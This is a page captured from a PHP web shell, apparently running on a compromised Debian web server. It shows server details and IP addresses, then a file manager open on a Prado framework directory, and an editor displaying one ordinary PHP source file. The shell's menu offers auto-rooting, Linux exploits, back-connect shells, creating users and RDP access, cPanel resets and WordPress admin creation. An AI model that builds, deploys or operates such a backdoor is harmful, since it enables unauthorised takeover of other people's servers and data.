Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.128.201.71
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
framework /
Data /
SqlMap /
Configuration /
[ HOME SHELL ]
Name
Size
Permission
Action
TDiscriminator.php
5.44
KB
-rw-r--r--
TInlineParameterMapParser.php
2.11
KB
-rw-r--r--
TParameterMap.php
5.5
KB
-rw-r--r--
TParameterProperty.php
3.55
KB
-rw-r--r--
TResultMap.php
4.49
KB
-rw-r--r--
TResultProperty.php
9.3
KB
-rw-r--r--
TSimpleDynamicParser.php
1.15
KB
-rw-r--r--
TSqlMapCacheModel.php
5.69
KB
-rw-r--r--
TSqlMapStatement.php
10.35
KB
-rw-r--r--
TSqlMapXmlConfiguration.php
22.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TSimpleDynamicParser.php
<?php /** * TSimpleDynamicParser class file. * * @author Wei Zhuo <weizhuo[at]gmail[dot]com> * @link http://www.pradosoft.com/ * @copyright Copyright © 2005-2014 PradoSoft * @license http://www.pradosoft.com/license/ * @package System.Data.SqlMap.Configuration */ /** * TSimpleDynamicParser finds place holders $name$ in the sql text and replaces * it with a TSimpleDynamicParser::DYNAMIC_TOKEN. * * @author Wei Zhuo <weizho[at]gmail[dot]com> * @package System.Data.SqlMap.Configuration * @since 3.1 */ class TSimpleDynamicParser { const PARAMETER_TOKEN_REGEXP = '/\$([^\$]+)\$/'; const DYNAMIC_TOKEN = '`!`'; /** * Parse the sql text for dynamic place holders of the form $name$. * @param string Sql text. * @return array name value pairs 'sql' and 'parameters'. */ public function parse($sqlText) { $matches = array(); $mappings = array(); preg_match_all(self::PARAMETER_TOKEN_REGEXP, $sqlText, $matches); for($i = 0, $k=count($matches[1]); $i<$k; $i++) { $mappings[] = $matches[1][$i]; $sqlText = str_replace($matches[0][$i], self::DYNAMIC_TOKEN, $sqlText); } return array('sql'=>$sqlText, 'parameters'=>$mappings); } }
Close